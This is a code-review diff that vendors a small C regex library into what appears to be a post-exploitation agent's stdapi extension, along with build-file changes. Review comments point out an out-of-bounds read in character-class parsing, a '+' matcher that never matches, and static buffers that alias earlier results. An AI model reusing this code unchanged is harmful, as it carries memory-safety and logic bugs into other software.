while (&text[text_offset] >= prepoint)
{
if (matchpattern(pattern, text, text_length, text_offset--, matchlength))
return 1;
(*matchlength)--;
}
*matchlength = prelen;
return 0;
}
static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength)
{
const char* prepoint = text;
while ((text_offset < text_length) && matchone(p, text[text_offset]))
{
text_offset++;
(*matchlength)++;
}
while (text > prepoint)
{
if (matchpattern(pattern, text, text_length, text_offset--, matchlength))
return 1;
(*matchlength)--;
}
return 0;
}
static int matchquestion(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength)
{
if (p.type == UNUSED)
return 1;
if (matchpattern(pattern, text, text_length, text_offset, matchlength))
return 1;
if ((text_offset < text_length) && matchone(p, text[text_offset++]))
{
if (matchpattern(pattern, text, text_length, text_offset, matchlength))
{
(*matchlength)++;
return 1;
}
}
return 0;
}
#if 0
/* Recursive matching */
static int matchpattern(regex_t* pattern, const char* text, int *matchlength)
{
int pre = *matchlength;
if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK))
{
return matchquestion(pattern[1], &pattern[2], text, matchlength);
}
else if (pattern[1].type == STAR)
{
return matchstar(pattern[0], &pattern[2], text, matchlength);
}
else if (pattern[1].type == PLUS)
{
return matchplus(pattern[0], &pattern[2], text, matchlength);
}
else if ((pattern[0].type == END) && pattern[1].type == UNUSED)
{
return text[0] == '\0';
}
else if ((text[0] != '\0') && matchone(pattern[0], text[0]))
{
(*matchlength)++;
return matchpattern(&pattern[1], text+1);
}
else
{
*matchlength = pre;
return 0;
}
}
#else
/* Iterative matching */
static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength)
{
size_t pre = *matchlength;
do
{
if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK))
{
return matchquestion(pattern[0], &pattern[2], text, text_length, text_offset, matchlength);
}
else if (pattern[1].type == STAR)
{
return matchstar(pattern[0], &pattern[2], text, text_length, text_offset, matchlength);
}
else if (pattern[1].type == PLUS)
{
return matchplus(pattern[0], &pattern[2], text, text_length, text_offset, matchlength);
}
else if ((pattern[0].type == END) && pattern[1].type == UNUSED)
{
return (text_offset == text_length - 1);
}
/* Branching is not working properly
else if (pattern[1].type == BRANCH)
{
return (matchpattern(pattern, text) || matchpattern(&pattern[2], text));
}
*/
(*matchlength)++;
}
while ((text_offset < text_length) && matchone(*pattern++, text[text_offset++]));
*matchlength = pre;
return 0;
}
#endif
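Review bot: `re_compile` now takes `pattern_length`, but the character-class branch still scans for a NUL terminator (`pattern[i+1] == '^'`, `pattern[++i] != ']' && pattern[i] != '\0'`, `pattern[i+1] == 0`), so a pattern with an unterminated `[` is read past `pattern_length`; the memory-search handler in this commit passes a heap buffer of exactly that length with no terminator. Bound each of those reads by the length, e.g. `while ((++i < (int)pattern_length) && (pattern[i] != ']'))`, and return 0 when the loop ends without a `]`. The trailing `if (pattern[i] == 0) return 0;` also rejects any pattern containing a zero byte, which looks at odds with the null-byte support the accompanying README states. Separately, `re_compiled` and `ccl_buf` are function-static, so each call overwrites the previous result; a comment on `re_compile` should say the returned pointer is only valid until the next call, since a caller that stores several compiled patterns ends up with aliases of the last one. In `matchplus`, `while (text > prepoint)` can never be true now that `prepoint` is initialised from `text` and only `text_offset` advances, so `+` appears never to match.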

@ -0,0 +1,75 @@
/*
*
* Mini regex-module inspired by Rob Pike's regex code described in:
*
* http://www.cs.princeton.edu/courses/archive/spr09/cos333/beautiful.html
*
*
*
* Supports:
* ---------
* '.' Dot, matches any character
* '^' Start anchor, matches beginning of string
* '$' End anchor, matches end of string
* '*' Asterisk, match zero or more (greedy)
* '+' Plus, match one or more (greedy)
* '?' Question, match zero or one (non-greedy)
* '[abc]' Character class, match if one of {'a', 'b', 'c'}
* '[^abc]' Inverted class, match if NOT one of {'a', 'b', 'c'} -- NOTE: feature is currently broken!
* '[a-zA-Z]' Character ranges, the character set of the ranges { a-z | A-Z }
* '\s' Whitespace, \t \f \r \n \v and spaces
* '\S' Non-whitespace
* '\w' Alphanumeric, [a-zA-Z0-9_]
* '\W' Non-alphanumeric
* '\d' Digits, [0-9]
* '\D' Non-digits
*
*
*/
#ifndef _TINY_REGEX_C
#define _TINY_REGEX_C
#ifndef RE_DOT_MATCHES_NEWLINE
/* Define to 0 if you DON'T want '.' to match '\r' + '\n' */
#define RE_DOT_MATCHES_NEWLINE 1
#endif
#ifdef __cplusplus
extern "C"{
#endif
// size_t for 32-bit compilation.
#include <stddef.h>
typedef struct regex_t
{
unsigned char type; /* CHAR, STAR, etc. */
union
{
unsigned char ch; /* the character itself */
unsigned char* ccl; /* OR a pointer to characters in class */
} u;
} regex_t;
/* Typedef'd pointer to get abstract datatype. */
typedef struct regex_t* re_t;
/* Compile regex string pattern to a regex_t-array. */
re_t re_compile(const char* pattern, size_t pattern_length);
/* Find matches of the compiled pattern inside text. */
int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength);
/* Find matches of the txt pattern inside text (will compile automatically first). */
int re_match(const char* pattern, size_t pattern_length, const char* text, size_t text_length, size_t* matchlength);
#ifdef __cplusplus
}
#endif
#endif /* ifndef _TINY_REGEX_C */

@ -22,6 +22,7 @@ include_directories(../../source/common)
include_directories(../../source/jpeg-8)
include_directories(../../source/ReflectiveDLLInjection/common)
include_directories(../../source/extensions/stdapi/server)
include_directories(../../source/tiny-regex-c)
set(SRC_DIR ../../source/extensions/stdapi)
file(GLOB_RECURSE SRC_FILES
@ -29,6 +30,7 @@ file(GLOB_RECURSE SRC_FILES
${SRC_DIR}/*.cpp
${SRC_DIR}/*.rc
${MOD_DEF_DIR}/extension.def
../../source/tiny-regex-c/*.c
)
list(REMOVE_ITEM SRC_FILES ${CMAKE_CURRENT_SOURCE_DIR}/${SRC_DIR}/server/resource/hook.c)
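Review bot: The added `../../source/tiny-regex-c/*.c` pattern sits inside `file(GLOB_RECURSE …)`, so every `.c` file anywhere under the vendored directory is compiled into the extension, whereas the Visual Studio project in this commit names `re.c` explicitly. Listing the file by name, `../../source/tiny-regex-c/re.c`, the way `${MOD_DEF_DIR}/extension.def` is already listed, keeps the two builds in step and means a file added to the vendored tree later is not silently built. The new `include_directories(../../source/tiny-regex-c)` is directory-scoped like the lines around it; a `target_include_directories(... PRIVATE ...)` on the stdapi target would keep the path from leaking to other targets, though the target name is not visible in these hunks. The `file(GLOB_RECURSE` call opens in the first hunk and closes in the second, and its first patterns may fall between the two.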

@ -559,6 +559,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile Include="..\..\source\extensions\stdapi\server\webcam\bmp2jpeg.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\webcam\webcam.cpp" />
<ClCompile Include="..\..\source\logging\logging.c" />
<ClCompile Include="..\..\source\tiny-regex-c\re.c" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="..\..\source\extensions\stdapi\server\resource\stdapi.rc" />
@ -587,6 +588,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClInclude Include="..\..\source\extensions\stdapi\server\fs\fs.h" />
<ClInclude Include="..\..\source\extensions\stdapi\server\fs\fs_local.h" />
<ClInclude Include="..\..\source\extensions\stdapi\server\fs\search.h" />
<ClInclude Include="..\..\source\tiny-regex-c\re.h" />
</ItemGroup>
<ItemGroup>
<None Include="..\..\source\extensions\stdapi\server\resource\hook.dll" />